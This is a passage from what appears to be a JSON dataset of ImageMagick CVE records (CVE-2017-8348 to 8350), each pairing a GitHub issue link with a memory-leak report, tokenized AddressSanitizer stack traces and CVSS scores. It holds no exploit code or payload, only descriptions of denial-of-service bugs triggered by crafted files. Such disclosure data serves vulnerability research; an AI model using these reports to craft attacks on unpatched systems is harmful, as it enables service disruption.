of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f2bb NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG fac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f2baea4fb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14647. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14648. "severity": "MEDIUM",
  14649. "baseScore": 6.5,
  14650. "impactScore": 3.6,
  14651. "exploitabilityScore": 2.8
  14652. },
  14653. {
  14654. "CVE_ID": "CVE-2017-8348",
  14655. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/445",
  14656. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/445",
  14657. "Repo_new": "imagemagick/imagemagick",
  14658. "Issue_Created_At": "2017-04-26T16:43:24Z",
  14659. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fbc6f9c6b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG a7e4c in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fbc6acd5b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14660. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14661. "severity": "MEDIUM",
  14662. "baseScore": 6.5,
  14663. "impactScore": 3.6,
  14664. "exploitabilityScore": 2.8
  14665. },
  14666. {
  14667. "CVE_ID": "CVE-2017-8349",
  14668. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/443",
  14669. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/443",
  14670. "Repo_new": "imagemagick/imagemagick",
  14671. "Issue_Created_At": "2017-04-26T16:40:36Z",
  14672. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd NUMBERTAG ca3eb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ac NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd NUMBERTAG d4db NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14673. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14674. "severity": "MEDIUM",
  14675. "baseScore": 6.5,
  14676. "impactScore": 3.6,
  14677. "exploitabilityScore": 2.8
  14678. },
  14679. {
  14680. "CVE_ID": "CVE-2017-8350",
  14681. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/447",
  14682. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/447",
  14683. "Repo_new": "imagemagick/imagemagick",
  14684. "Issue_Created_At": "2017-04-26T16:45:21Z",
  14685. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG a2a in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG 